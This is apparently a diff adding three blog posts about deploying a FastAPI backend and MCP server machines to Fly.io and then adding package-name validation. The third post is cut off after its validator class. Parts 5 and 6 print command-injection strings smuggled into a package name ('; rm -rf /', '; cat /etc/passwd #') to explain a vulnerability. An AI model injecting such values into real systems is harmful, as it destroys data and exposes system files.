+**Next Post**: [Part 4: First Deployment - Fly.io Adventures](04-first-deployment-flyio.md)
diff --git a/blog/04-first-deployment-flyio.md b/blog/04-first-deployment-flyio.md
new file mode 100644
index 0000000..f593394
--- /dev/null
+++ b/blog/04-first-deployment-flyio.md
@@ -0,0 +1,475 @@
+---
+title: "Part 4: First Deployment - Fly.io Adventures"
+series: "Catwalk Live Development Journey"
+part: 4
+date: 2025-12-12
+updated: 2025-12-27
+tags: [deployment, fly.io, docker, postgresql, infrastructure, debugging]
+reading_time: "14 min"
+commits_covered: "5d1fb9f...f15370c"
+---
+
+## The Moment of Truth
+
+December 12, 2025. The application works perfectly on localhost:
+- Backend API responding at `localhost:8000`
+- Frontend rendering at `localhost:3000`
+- PostgreSQL running in Docker
+- Analysis works, forms generate, encryption encrypts
+
+It's time to **ship to production**.
+
+How hard could it be?
+
+## Attempt 1: The Naive Dockerfile
+
+AI (Claude Code) generated a Dockerfile:
+
+```dockerfile
+FROM python:3.12-slim
+
+WORKDIR /app
+
+COPY requirements.txt .
+RUN pip install -r requirements.txt
+
+COPY . .
+
+CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8080"]
+```
+
+I ran `fly deploy`. It built. It deployed. It... crashed immediately.
+
+```
+2025-12-12T14:23:01Z [error] ModuleNotFoundError: No module named 'openai'
+```
+
+**What happened**: `requirements.txt` was incomplete. The analysis service imported `openai` but it wasn't listed as a dependency.
+
+**The fix**: Add all missing dependencies:
+
+```txt
+# requirements.txt
+fastapi>=0.115.0
+uvicorn[standard]>=0.30.0
+sqlalchemy>=2.0.0
+alembic>=1.13.0
+psycopg[binary]>=3.1.0 # PostgreSQL driver
+cryptography>=41.0.0 # Fernet encryption
+pydantic>=2.0.0
+pydantic-settings>=2.0.0
+openai>=1.0.0 # For Claude API via OpenRouter
+httpx>=0.27.0 # HTTP client
+email-validator>=2.1.0 # Required by Pydantic EmailStr
+```
+
+**Lesson 1**: AI doesn't always track dependencies correctly. Always verify imports match requirements.
+
+## Attempt 2: The Database Connection Failure
+
+With dependencies fixed, the app started. Then:
+
+```
+2025-12-12T14:45:12Z [error] sqlalchemy.exc.ArgumentError:
+Could not parse SQLAlchemy URL from string 'postgres://...'
+```
+
+**Context**: Fly.io PostgreSQL provides URLs like:
+```
+postgres://user:pass@db-name.internal:5432/dbname?sslmode=disable
+```
+
+SQLAlchemy 2.0 with async requires:
+```
+postgresql+psycopg://user:pass@db-name.internal:5432/dbname
+```
+
+**The problem**: Driver mismatch. Fly gives `postgres://`, SQLAlchemy wants `postgresql+psycopg://`.
+
+**AI's first solution**: Use `asyncpg` driver.
+
+```python
+# ❌ AI suggested this
+DATABASE_URL = "postgresql+asyncpg://..."
+```
+
+Deployed. Crashed.
+
+```
+2025-12-12T15:10:33Z [error] asyncpg.exceptions.InvalidParameterValue:
+sslmode 'disable' is not supported
+```
+
+**The real problem**: Fly.io URLs include `?sslmode=disable`. The `asyncpg` driver doesn't support this parameter format.
+
+**The actual solution**: Use `psycopg3` and transform URLs.
+
+```python
+# backend/app/core/config.py
+from pydantic_settings import BaseSettings
+from pydantic import field_validator
+
+class Settings(BaseSettings):
+ DATABASE_URL: str
+
+ @field_validator("DATABASE_URL")
+ @classmethod
+ def fix_postgres_url(cls, v: str) -> str:
+ """
+ Convert Fly.io postgres:// URLs to SQLAlchemy format.
+
+ Fly.io: postgres://user:pass@host:5432/db?sslmode=disable
+ SQLAlchemy 2.0 async: postgresql+psycopg://user:pass@host:5432/db?sslmode=disable
+ """
+ if v.startswith("postgres://"):
+ return v.replace("postgres://", "postgresql+psycopg://", 1)
+ return v
+```
+
+**Why this works**: `psycopg3` supports all PostgreSQL SSL parameters. It's the modern, async-compatible driver.
+
+**Lesson 2**: Infrastructure details matter. AI suggested a driver that doesn't work with Fly.io's conventions.
+
+## Attempt 3: The Shell Script Disaster
+
+The app connected to the database! But database tables didn't exist.
+
+**Solution**: Run Alembic migrations on startup.
+
+AI generated:
+
+```dockerfile
+# ❌ AI's approach
+COPY docker-entrypoint.sh .
+RUN chmod +x docker-entrypoint.sh
+CMD ["./docker-entrypoint.sh"]
+```
+
+```bash
+#!/bin/bash
+# docker-entrypoint.sh
+alembic upgrade head
+uvicorn app.main:app --host 0.0.0.0 --port 8080
+```
+
+Deployed. Crashed.
+
+```
+2025-12-12T16:05:44Z [error] /bin/sh: ./docker-entrypoint.sh: not found
+```
+
+**What happened**: I created the shell script on Windows. Windows uses CRLF (`\r\n`) line endings. Linux expects LF (`\n`). The script was literally unreadable to the Linux container.
+
+**The fix**: Don't use shell scripts in Docker when developing on Windows.
+
+```dockerfile
+# ✅ Inline commands instead
+CMD ["sh", "-c", "alembic upgrade head && uvicorn app.main:app --host 0.0.0.0 --port 8080"]
+```
+
+**Even better**: Use Fly.io's `release_command` feature:
+
+```toml
+# fly.toml
+[deploy]
+ release_command = "alembic upgrade head"
+
+[http_service]
+ internal_port = 8080
+ force_https = true
+ auto_stop_machines = "off"
+ auto_start_machines = true
+ min_machines_running = 1
+```
+
+Now migrations run **before** deployment. If migrations fail, deployment aborts. Much safer.
+
+**Lesson 3**: Avoid shell scripts in Docker when cross-platform development is involved. Use native tooling.
+
+## Attempt 4: The Database Cluster Meltdown
+
+The app started successfully! Then, 6 hours later:
+
+```
+2025-12-12T22:34:12Z [error] psycopg.OperationalError:
+connection to server at "catwalk-db.internal" failed:
+no active leader found
+```
+
+**What happened**: Fly.io's single-node PostgreSQL clusters can enter a broken state where there's "no active leader." The cluster becomes completely unusable.
+
+**AI's suggestion**: Restart the database.
+
+```bash
+fly machines restart
+```
+
+Didn't work. Still broken.
+
+**The nuclear option** (from Fly.io docs):
+
+```bash
+# Destroy the broken cluster
+fly apps destroy catwalk-db
+
+# Create a fresh cluster
+fly postgres create --name catwalk-db-v2
+
+# Attach to backend
+fly postgres attach catwalk-db-v2 --app catwalk-backend
+```
+
+**Result**: New database, clean slate, working again.
+
+**Data loss**: Everything. But this was day 2 of development with no real users, so... acceptable.
+
+**Lesson 4**: Fly.io single-node databases are fragile. For production, use multi-node clusters or managed PostgreSQL (e.g., Supabase, Neon).
+
+**Long-term solution**: We documented the recovery procedure in `CLAUDE.md` so future AI sessions (and humans) know what to do:
+
+```markdown
+## Fly.io Postgres Cluster Recovery
+
+If you see "no active leader found":
+
+1. Don't try to repair - faster to recreate
+2. `fly apps destroy ` (accepts data loss)
+3. `fly postgres create --name `
+4. `fly postgres attach --app `
+5. Run migrations: `fly ssh console` → `alembic upgrade head`
+```
+
+## The Successful Deployment
+
+December 12, late evening. After fixing:
+- ✅ Missing dependencies
+- ✅ Database driver (asyncpg → psycopg3)
+- ✅ URL transformation
+- ✅ Shell script line endings
+- ✅ Database cluster recreation
+
+The deployment succeeded:
+
+```bash
+fly status --app catwalk-backend
+
+ID = catwalk-backend
+Status = running
+Hostname = catwalk-backend.fly.dev
+Platform = machines
+Region = sjc (San Jose)
+Machines = 1 (1 running)
+
+VM Resources:
+ CPUs: 1x shared
+ Memory: 512 MB
+```
+
+**The moment**: `curl https://catwalk-backend.fly.dev/api/health`
+
+```json
+{"status": "healthy"}
+```
+
+**Pure joy**. The backend was live.
+
+## The Dockerfile (Final Version)
+
+```dockerfile
+# Use official Python runtime
+FROM python:3.12-slim
+
+# Set working directory
+WORKDIR /app
+
+# Install system dependencies
+RUN apt-get update && apt-get install -y \
+ gcc \
+ postgresql-client \
+ && rm -rf /var/lib/apt/lists/*
+
+# Copy requirements first (layer caching)
+COPY requirements.txt .
+
+# Install Python dependencies
+RUN pip install --no-cache-dir -r requirements.txt
+
+# Copy application code
+COPY . .
+
+# Expose port (documentation only, Fly.io uses internal_port from fly.toml)
+EXPOSE 8080
+
+# Run uvicorn (migrations handled by release_command)
+CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8080"]
+```
+
+**Key elements**:
+- `python:3.12-slim` - Smaller image
+- System dependencies in one RUN - fewer layers
+- `requirements.txt` copied first - Docker layer caching
+- No shell scripts - just `uvicorn`
+
+## The Fly.io Configuration
+
+```toml
+# fly.toml
+app = "catwalk-backend"
+primary_region = "sjc"
+
+[build]
+ dockerfile = "Dockerfile"
+
+[deploy]
+ release_command = "alembic upgrade head"
+
+[env]
+ PORT = "8080"
+ PUBLIC_URL = "https://catwalk-backend.fly.dev"
+
+[http_service]
+ internal_port = 8080
+ force_https = true
+ auto_stop_machines = "off"
+ auto_start_machines = true
+ min_machines_running = 1
+
+[[vm]]
+ cpu_kind = "shared"
+ cpus = 1
+ memory_mb = 512
+```
+
+**Configuration decisions**:
+
+- **`auto_stop_machines = "off"`**: Backend stays running 24/7. No cold starts.
+- **`min_machines_running = 1`**: Always one instance running.
+- **`release_command`**: Migrations before deployment (safer).
+- **`force_https`**: All HTTP → HTTPS redirects.
+- **512MB RAM**: Plenty for FastAPI + SQLAlchemy.
+
+## Secrets Management
+
+Fly.io secrets are environment variables encrypted at rest:
+
+```bash
+# Set secrets (never commit these!)
+fly secrets set \
+ DATABASE_URL="postgresql+psycopg://..." \
+ ENCRYPTION_KEY="$(python -c 'from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())')" \
+ OPENROUTER_API_KEY="sk-or-..." \
+ AUTH_SECRET="$(openssl rand -base64 32)" \
+ --app catwalk-backend
+```
+
+**Secrets set this way**:
+- Encrypted at rest
+- Available as environment variables in the app
+- Not logged
+- Rotatable (set new value, old value overwritten)
+
+**What we learned**: Never log secrets. Never return secrets in API responses. Decrypt only in memory.
+
+## Database Setup
+
+```bash
+# Create PostgreSQL cluster
+fly postgres create \
+ --name catwalk-db \
+ --region sjc \
+ --vm-size shared-cpu-1x \
+ --volume-size 10
+
+# Attach to backend (sets DATABASE_URL automatically)
+fly postgres attach catwalk-db --app catwalk-backend
+```
+
+**Attachment benefits**:
+- `DATABASE_URL` secret automatically set
+- Uses Fly.io internal DNS (`.internal`)
+- No public internet exposure
+
+**Database specs**:
+- PostgreSQL 15
+- 10GB volume
+- Shared CPU (free tier)
+- Single node (fragile, but fine for MVP)
+
+## The Cost Reality
+
+Running on Fly.io:
+
+| Resource | Specs | Monthly Cost |
+|----------|-------|--------------|
+| Backend VM | 512MB, shared CPU, always-on | ~$1.94 |
+| PostgreSQL | 10GB, single-node | $0 (free tier) |
+| **Total** | | **~$1.94/month** |
+
+Cheaper than a coffee. **Production infrastructure for $2/month**.
+
+## Monitoring & Debugging
+
+```bash
+# Real-time logs
+fly logs --app catwalk-backend
+
+# Check app status
+fly status --app catwalk-backend
+
+# SSH into container (debugging)
+fly ssh console --app catwalk-backend
+
+# Database console
+fly postgres connect --app catwalk-db
+```
+
+**Log watching became a habit**. Every deploy: `fly logs` in a terminal, watch for errors.
+
+## What Worked vs What Didn't
+
+### AI-Generated Code That Worked ✅
+- FastAPI app structure
+- Pydantic models
+- Database migrations (Alembic)
+- Environment variable configuration
+
+### AI-Generated Code That Failed ❌
+- Database driver choice (asyncpg)
+- Shell script approach (CRLF issues)
+- Dependency tracking (missing packages)
+- Error handling (too generic)
+
+### Human Intervention Required 🧠
+- PostgreSQL driver debugging
+- Fly.io-specific configuration
+- Database cluster recovery
+- Secrets management strategy
+
+**The pattern**: AI handles **known patterns** well. AI fails at **infrastructure quirks** and **platform-specific issues**.
+
+## Up Next
+
+The backend is deployed. The database is running. The health endpoint responds.
+
+But the platform doesn't **do** anything yet. We can analyze repos, but we can't deploy MCP servers.
+
+Time to build the core: **Streamable HTTP and MCP Machines**.
+
+That's Part 5: Implementing Streamable HTTP & MCP Machines.
+
+---
+
+**Key Commits**:
+- `5d1fb9f` - Enable backend production deployment to Fly.io
+- `f15370c` - Backend: deploy Fly MCP machines + Streamable HTTP bridge
+
+**Related Files**:
+- `backend/Dockerfile` - Production container
+- `backend/fly.toml` - Fly.io configuration
+- `backend/app/core/config.py` - Database URL transformer
+
+**Debugging Resources**:
+- `CLAUDE.md` - Deployment pitfalls and solutions
+- `context/CURRENT_STATUS.md` - Database recovery procedures
+
+**Next Post**: [Part 5: Implementing Streamable HTTP & MCP Machines](05-streamable-http-mcp-machines.md)
diff --git a/blog/05-streamable-http-mcp-machines.md b/blog/05-streamable-http-mcp-machines.md
new file mode 100644
index 0000000..d5dc921
--- /dev/null
+++ b/blog/05-streamable-http-mcp-machines.md
@@ -0,0 +1,557 @@
+---
+title: "Part 5: Implementing Streamable HTTP & MCP Machines"
+series: "Catwalk Live Development Journey"
+part: 5
+date: 2025-12-14
+updated: 2025-12-27
+tags: [MCP, streamable-http, fly-machines, protocol, networking]
+reading_time: "16 min"
+commits_covered: "f1b3e68...0bdfc23"
+---
+
+## The Core Mission
+
+We have a deployed backend. We can analyze GitHub repos. We can encrypt credentials. But we can't actually **run MCP servers yet**.
+
+This is the moment where Catwalk Live goes from "interesting idea" to "working platform."
+
+**The goal**: When a user creates a deployment, spin up an isolated Fly.io container running their MCP server, and expose it as a Streamable HTTP endpoint that Claude Desktop can connect to.
+
+Sounds simple. It wasn't.
+
+## Understanding the MCP Protocol
+
+First, I needed to deeply understand the Model Context Protocol (MCP).
+
+**MCP in 30 seconds**:
+- **Purpose**: Let AI assistants (like Claude) call tools, access resources, and use prompts from external servers
+- **Architecture**: Client-server protocol with JSON-RPC 2.0 messages
+- **Transport**: Originally stdio (standard input/output), then SSE (Server-Sent Events), now **Streamable HTTP**
+
+**The transport evolution**:
+1. **stdio** (2024): Claude runs MCP server as subprocess, communicates via stdin/stdout
+2. **SSE** (2024-11-05): Separate GET `/sse` (server → client events) and POST `/messages` (client → server requests)
+3. **Streamable HTTP** (2025-06-18): **Single unified endpoint**, GET and POST both to `/mcp`, with session management
+
+**Why Streamable HTTP**:
+- Simpler (one endpoint vs two)
+- Better for proxying (no need to coordinate SSE + POST)
+- Session-based (reconnection without reinitialization)
+- More flexible (supports both streaming and non-streaming responses)
+
+**The spec I implemented**: [MCP 2025-06-18 Streamable HTTP](https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#streamable-http)
+
+## The Architecture
+
+Here's how requests flow:
+
+```
+┌──────────────────┐
+│ Claude Desktop │ User: "What are my TickTick tasks?"
+└────────┬─────────┘
+ │ POST /mcp
+ │ MCP-Protocol-Version: 2025-06-18
+ │ MCP-Session-Id:
+ │ {jsonrpc: "2.0", method: "tools/call", params: {...}}
+ ↓
+┌─────────────────────────────────────┐
+│ Catwalk Backend (FastAPI) │
+│ https://backend.fly.dev/api/mcp/{id}│
+│ - Validates access token │
+│ - Retrieves deployment record │
+│ - Proxies to MCP machine │
+└────────┬────────────────────────────┘
+ │ POST /mcp
+ │ (over Fly.io private network)
+ │ http://{machine_id}.vm.mcp-host.internal:8080/mcp
+ ↓
+┌─────────────────────────────────────┐
+│ MCP Machine (Fly.io Container) │
+│ - mcp-proxy (HTTP ↔ stdio) │
+│ - npx @hong-hao/mcp-ticktick │
+│ - Env: TICKTICK_TOKEN= │
+└────────┬────────────────────────────┘
+ │ stdio communication
+ │ JSON-RPC messages
+ ↓
+ MCP Server executes tool
+ Returns result via stdout
+ ↓
+ mcp-proxy converts to HTTP response
+ ↓
+ Backend proxies response to Claude
+ ↓
+ Claude synthesizes answer for user
+```
+
+**Key insight**: The user sees one endpoint. Behind the scenes, requests flow through multiple systems.
+
+## Implementing the MCP Endpoint
+
+### The Streamable HTTP Handler
+
+```python
+# backend/app/api/mcp_streamable.py
+from fastapi import APIRouter, Request, Response
+from fastapi.responses import StreamingResponse
+
+router = APIRouter()
+
+@router.api_route(
+ "/mcp/{deployment_id}",
+ methods=["GET", "POST"],
+ response_class=Response
+)
+async def mcp_streamable(
+ deployment_id: str,
+ request: Request,
+ access_token: str = Header(None, alias="X-Access-Token")
+):
+ """
+ MCP Streamable HTTP endpoint (2025-06-18 spec).
+
+ Supports:
+ - Protocol version negotiation (2025-06-18, 2025-03-26, 2024-11-05)
+ - Session management (Mcp-Session-Id header)
+ - JSON-RPC 2.0 (requests and notifications)
+ - Streaming responses (server-sent events via text/event-stream)
+ """
+
+ # 1. Validate access token
+ deployment = await get_deployment(deployment_id)
+ if deployment.access_token != access_token:
+ raise HTTPException(401, "Invalid access token")
+
+ # 2. Get protocol version from headers
+ protocol_version = request.headers.get("Mcp-Protocol-Version", "2025-06-18")
+
+ # 3. Get or create session ID
+ session_id = request.headers.get("Mcp-Session-Id") or str(uuid.uuid4())
+
+ # 4. Proxy to MCP machine
+ machine_url = f"http://{deployment.machine_id}.vm.mcp-host.internal:8080/mcp"
+
+ # Forward request to MCP machine
+ async with httpx.AsyncClient() as client:
+ # GET request: Initialization or session resumption
+ if request.method == "GET":
+ response = await client.get(
+ machine_url,
+ headers={
+ "Accept": "application/json",
+ "Mcp-Protocol-Version": protocol_version,
+ "Mcp-Session-Id": session_id
+ }
+ )
+
+ # POST request: JSON-RPC call
+ else:
+ body = await request.body()
+ response = await client.post(
+ machine_url,
+ content=body,
+ headers={
+ "Content-Type": "application/json",
+ "Mcp-Protocol-Version": protocol_version,
+ "Mcp-Session-Id": session_id
+ }
+ )
+
+ # 5. Return response (preserving headers and streaming if applicable)
+ return Response(
+ content=response.content,
+ status_code=response.status_code,
+ headers=dict(response.headers),
+ media_type=response.headers.get("content-type")
+ )
+```
+
+**Key elements**:
+
+1. **Dual method support**: Same endpoint handles GET (init) and POST (calls)
+2. **Protocol version**: Respects `Mcp-Protocol-Version` header
+3. **Session management**: Persists `Mcp-Session-Id` across requests
+4. **Access control**: Validates deployment-specific token
+5. **Proxying**: Forwards to Fly machine over private network
+
+### Protocol Version Negotiation
+
+The MCP spec evolved. Clients might request older versions:
+
+```python
+SUPPORTED_VERSIONS = ["2025-06-18", "2025-03-26", "2024-11-05"]
+
+def validate_protocol_version(requested: str) -> str:
+ """
+ Validate and negotiate protocol version.
+
+ Returns highest supported version <= requested version.
+ Raises 400 if no compatible version.
+ """
+ if requested in SUPPORTED_VERSIONS:
+ return requested
+
+ # Client requests unknown version - return latest we support
+ return "2025-06-18"
+```
+
+**Why version negotiation**: Future-proofing. When MCP 2026 spec comes out, Catwalk can still serve 2025 clients.
+
+### Session Management
+
+Sessions let clients reconnect without reinitialization:
+
+```python
+class SessionManager:
+ """In-memory session store (TODO: Redis for multi-instance)"""
+
+ def __init__(self):
+ self.sessions: Dict[str, MCPSession] = {}
+
+ async def get_or_create(self, session_id: str, deployment_id: str) -> MCPSession:
+ """Get existing session or create new one"""
+ if session_id not in self.sessions:
+ self.sessions[session_id] = MCPSession(
+ id=session_id,
+ deployment_id=deployment_id,
+ created_at=datetime.utcnow()
+ )
+ return self.sessions[session_id]
+
+ async def cleanup_expired(self, max_age: timedelta = timedelta(hours=1)):
+ """Remove sessions older than max_age"""
+ now = datetime.utcnow()
+ self.sessions = {
+ sid: session
+ for sid, session in self.sessions.items()
+ if (now - session.created_at) < max_age
+ }
+```
+
+**Trade-off**: In-memory sessions work for single-instance deployments. For multi-instance, need Redis or sticky sessions.
+
+## Building the MCP Machine
+
+The MCP machine is a Fly.io container running:
+1. **mcp-proxy**: HTTP ↔ stdio adapter
+2. **User's MCP server**: Installed dynamically via npm/pip
+
+### The Machine Image
+
+```dockerfile
+# deploy/Dockerfile (mcp-proxy image)
+FROM node:20-slim
+
+# Install Python (supports both npm and PyPI MCP servers)
+RUN apt-get update && apt-get install -y python3 python3-pip
+
+# Install mcp-proxy globally
+RUN npm install -g @modelcontextprotocol/proxy
+
+# Expose port
+EXPOSE 8080
+
+# Start mcp-proxy with dynamic package
+# MCP_PACKAGE env var set by deployment
+CMD npx -y $MCP_PACKAGE | mcp-proxy http --port 8080
+```
+
+**How it works**:
+1. `npx -y $MCP_PACKAGE` - Installs and runs the MCP server package
+2. `| mcp-proxy http` - Pipes stdout to mcp-proxy, which:
+ - Listens on HTTP port 8080
+ - Converts HTTP requests → JSON-RPC messages → MCP server stdin
+ - Converts MCP server stdout → JSON-RPC responses → HTTP responses
+
+**Why this architecture**:
+- Generic: Works with ANY MCP server (npm or PyPI)
+- Isolated: Each deployment gets its own container
+- Secure: No shared state between deployments
+
+### Deploying a Machine
+
+```python
+# backend/app/services/fly_deployment_service.py
+import httpx
+
+class FlyDeploymentService:
+ """Deploy MCP servers to Fly.io Machines"""
+
+ def __init__(self, api_token: str, mcp_image: str):
+ self.api_token = api_token
+ self.mcp_image = mcp_image # e.g., "registry.fly.io/mcp-host:latest"
+ self.base_url = "https://api.machines.dev/v1"
+
+ async def create_machine(
+ self,
+ app_name: str,
+ deployment_id: str,
+ mcp_package: str,
+ credentials: Dict[str, str]
+ ) -> str:
+ """
+ Create a Fly machine running the MCP server.
+
+ Returns:
+ machine_id: Fly machine ID
+ """
+
+ # Construct environment variables
+ env = {
+ "MCP_PACKAGE": mcp_package, # e.g., "@hong-hao/mcp-ticktick"
+ **credentials # e.g., {"TICKTICK_TOKEN": "..."}
+ }
+
+ # Machine configuration
+ config = {
+ "name": f"mcp-{deployment_id[:8]}",
+ "config": {
+ "image": self.mcp_image,
+ "env": env,
+ "guest": {
+ "cpu_kind": "shared",
+ "cpus": 1,
+ "memory_mb": 256 # Tiny - MCP servers are lightweight
+ },
+ "restart": {
+ "policy": "always" # Auto-restart if crashed
+ },
+ "services": [{
+ "ports": [{
+ "port": 8080,
+ "handlers": ["http"]
+ }],
+ "protocol": "tcp",
+ "internal_port": 8080
+ }]
+ }
+ }
+
+ # Create machine via Fly.io API
+ async with httpx.AsyncClient() as client:
+ response = await client.post(
+ f"{self.base_url}/apps/{app_name}/machines",
+ json=config,
+ headers={
+ "Authorization": f"Bearer {self.api_token}",
+ "Content-Type": "application/json"
+ }
+ )
+
+ response.raise_for_status()
+ data = response.json()
+ return data["id"] # machine_id
+```
+
+**Machine specs**:
+- 256MB RAM (MCP servers are tiny)
+- Shared CPU (no need for dedicated)
+- Auto-restart policy (survive crashes)
+- Internal port 8080 (Fly private network)
+
+**Cost**: ~$0.65/month per always-on machine. Cheap.
+
+## The Fly.io Private Network Challenge
+
+**The problem**: Fly machines have internal DNS: `{machine_id}.vm.{app_name}.internal`
+
+Backend needs to reach machines, but:
+- Machines are on Fly's private network (`.internal` TLD)
+- Backend needs to be in the same Fly network
+- DNS resolution must work
+
+**The solution**: Deploy backend and machines in the same Fly organization and region.
+
+```toml
+# backend/fly.toml
+app = "catwalk-backend"
+primary_region = "sjc"
+
+# MCP machines also deployed to sjc region
+```
+
+**Private network connectivity**:
+
+```python
+# This works from within Fly.io network:
+machine_url = f"http://{machine_id}.vm.mcp-host.internal:8080/mcp"
+
+# This would NOT work from outside Fly:
+# machine_url = f"http://{machine_id}.fly.dev/mcp" # Public DNS doesn't exist
+```
+
+**Debugging tip**: SSH into backend and test connectivity:
+
+```bash
+fly ssh console --app catwalk-backend
+# Inside container:
+curl http://.vm.mcp-host.internal:8080/status
+```
+
+## The Header That Stumped Me
+
+December 14, 10 PM. Machines are running. Backend is proxying. But Claude can't connect.
+
+**Error**: `406 Not Acceptable`
+
+I tested the machine directly:
+
+```bash
+curl http://{machine_id}.vm.mcp-host.internal:8080/mcp
+
+# Response: 406 Not Acceptable
+```
+
+**What happened**: `mcp-proxy` requires an `Accept` header:
+
+```bash
+curl -H "Accept: application/json" \
+ http://{machine_id}.vm.mcp-host.internal:8080/mcp
+
+# Response: 200 OK
+```
+
+**The fix**: Always include `Accept` header in proxied requests:
+
+```python
+response = await client.get(
+ machine_url,
+ headers={
+ "Accept": "application/json", # REQUIRED
+ "Mcp-Protocol-Version": protocol_version,
+ "Mcp-Session-Id": session_id
+ }
+)
+```
+
+**Lesson learned**: Read the spec carefully. `mcp-proxy` HTTP transport spec says:
+
+> Clients SHOULD send `Accept: application/json` header.
+
+"SHOULD" means "required in practice."
+
+## End-to-End Test
+
+December 14, 11 PM. Time to test the full flow:
+
+### Step 1: Create Deployment
+
+```bash
+POST /api/deployments
+{
+ "name": "My TickTick",
+ "repo_url": "https://github.com/hong-hao/mcp-ticktick",
+ "credentials": {
+ "TICKTICK_TOKEN": "my-secret-token"
+ }
+}
+
+Response:
+{
+ "id": "123e4567-e89b-12d3-a456-426614174000",
+ "connection_url": "https://backend.fly.dev/api/mcp/123e4567-e89b-12d3-a456-426614174000",
+ "access_token": "abc123...",
+ "status": "running",
+ "machine_id": "e2865013d24908"
+}
+```
+
+### Step 2: Add to Claude Desktop
+
+Edit `claude_desktop_config.json`:
+
+```json
+{
+ "mcpServers": {
+ "ticktick": {
+ "url": "https://backend.fly.dev/api/mcp/123e4567-e89b-12d3-a456-426614174000",
+ "transport": {
+ "type": "streamableHttp",
+ "headers": {
+ "X-Access-Token": "abc123..."
+ }
+ }
+ }
+ }
+}
+```
+
+### Step 3: Test in Claude
+
+**User**: "What are my TickTick tasks for today?"
+
+**Claude**: *(connects to MCP endpoint, calls tools/call with method=list_tasks)*
+
+**Result**: ✅ Works! Claude lists actual TickTick tasks.
+
+**The moment**: Pure elation. The entire platform works end-to-end.
+
+## Performance Metrics
+
+After successful deployment:
+
+- **Machine startup time**: ~8 seconds (pull image, start container, install package)
+- **First tool call latency**: ~1.2 seconds (initialize MCP server, execute tool)
+- **Subsequent calls**: ~300ms (server already initialized)
+- **Concurrent deployments**: Tested up to 10 (each isolated)
+
+**Bottleneck**: Package installation (npm/pip). Future optimization: Pre-cache popular packages.
+
+## What I Learned
+
+### AI-Generated Code That Worked ✅
+- FastAPI endpoint structure
+- HTTPX client configuration
+- Header forwarding logic
+
+### AI-Generated Code That Failed ❌
+- Private network URL construction (suggested `.fly.dev` instead of `.internal`)
+- `Accept` header omission (didn't read spec carefully)
+- Session cleanup strategy (suggested database, in-memory is fine for MVP)
+
+### Human Expertise Required 🧠
+- Deep MCP spec understanding (protocol version negotiation)
+- Fly.io private networking knowledge
+- Debugging 406 errors (requires understanding mcp-proxy internals)
+- Security: Access token validation
+
+**The pattern**: AI handles HTTP plumbing. Humans handle protocol nuances and platform-specific knowledge.
+
+## Up Next
+
+The platform works! You can deploy MCP servers. Claude can connect. Tools execute.
+
+But there's a glaring security hole: **We're not validating package names**.
+
+A malicious user could submit:
+```
+package: "; rm -rf /"
+```
+
+And we'd execute:
+```bash
+npx -y "; rm -rf /"
+```
+
+Disaster.
+
+Time to build **the Registry & Validation Layer**.
+
+That's Part 6.
+
+---
+
+**Key Commits**:
+- `f1b3e68` - Deploy: Add shared MCP host image + build scripts
+- `f15370c` - Backend: Deploy Fly MCP machines + Streamable HTTP bridge
+- `768d0b3` - Docs: Align docs with Streamable HTTP + deployment flow
+
+**Related Files**:
+- `backend/app/api/mcp_streamable.py` - MCP endpoint implementation
+- `backend/app/services/fly_deployment_service.py` - Fly Machines API
+- `deploy/Dockerfile` - MCP machine image
+
+**Spec Reference**:
+- [MCP Streamable HTTP Specification](https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#streamable-http)
+
+**Next Post**: [Part 6: Building the Registry & Validation Layer](06-registry-validation.md)
diff --git a/blog/06-registry-validation.md b/blog/06-registry-validation.md
new file mode 100644
index 0000000..2bf503a
--- /dev/null
+++ b/blog/06-registry-validation.md
@@ -0,0 +1,560 @@
+---
+title: "Part 6: Building the Registry & Validation Layer"
+series: "Catwalk Live Development Journey"
+part: 6
+date: 2025-12-16
+updated: 2025-12-27
+tags: [security, validation, npm, pypi, registry]
+reading_time: "13 min"
+commits_covered: "e41576b...ec955e6"
+---
+
+## The Security Wake-Up Call
+
+December 16, 2025. I'm proud. The platform works. Users can deploy MCP servers. Claude connects. Tools execute.
+
+Then **CodeRabbit** (automated PR review agent) posts a comment:
+
+> **HIGH SEVERITY**: Command injection vulnerability in deployment service.
+>
+> File: `backend/app/services/fly_deployment_service.py`
+> Line: 47
+>
+> The `mcp_package` value from user input is passed directly to shell execution without validation. An attacker could inject shell commands.
+>
+> Example exploit:
+> ```python
+> mcp_package = "; rm -rf / #"
+> # Executes: npx -y ; rm -rf / #
+> ```
+>
+> **Recommendation**: Validate package names against npm/PyPI registries before deployment.
+
+**Oh no.**
+
+I tested it. CodeRabbit was right:
+
+```python
+# Current code (VULNERABLE):
+env = {"MCP_PACKAGE": mcp_package} # mcp_package = user input
+# Machine runs: npx -y $MCP_PACKAGE
+
+# If mcp_package = "; cat /etc/passwd #"
+# Executes: npx -y ; cat /etc/passwd #
+```
+
+**The realization**: AI-generated code had a **critical security vulnerability**. And I almost shipped it to production.
+
+**Lesson 1**: Never trust AI-generated code with security implications. Always validate.
+
+## The Validation Strategy
+
+To prevent command injection, we need to **validate package names before deployment**:
+
+1. **Syntax validation**: Does it look like a valid package name?
+2. **Registry validation**: Does it exist in npm or PyPI?
+3. **Credential validation**: Does the user provide all required env vars?
+
+If any validation fails, reject the deployment **before** creating a machine.
+
+### Package Name Syntax
+
+```python
+# backend/app/services/package_validator.py
+import re
+
+class PackageValidator:
+ """Validate package names before deployment"""
+
+ # npm: @scope/package-name or package-name
+ NPM_PATTERN = r'^(@[\w-]+\/)?[\w-]+(\.[\w-]+)*$'
+
+ # PyPI: package-name (alphanumeric, hyphens, underscores)
+ PYPI_PATTERN = r'^[\w-]+(\.[\w-]+)*$'
+
+ @classmethod
+ def validate_syntax(cls, package: str, runtime: str) -> bool:
+ """
+ Validate package name syntax.
+
+ Args:
+ package: Package name to validate
+ runtime: 'npm' or 'python'
+
+ Returns:
+ True if syntax is valid
+
+ Raises:
+ ValueError if invalid
+ """
+ if runtime == "npm":
+ if not re.match(cls.NPM_PATTERN, package):
+ raise ValueError(
+ f"Invalid npm package name: {package}. "
+ "Expected format: 'package' or '@scope/package'"
+ )
+ elif runtime == "python":
+ if not re.match(cls.PYPI_PATTERN, package):
+ raise ValueError(
+ f"Invalid PyPI package name: {package}. "
+ "Expected format: 'package-name'"
+ )
+ else:
+ raise ValueError(f"Unknown runtime: {runtime}")
+
+ return True
+```
+
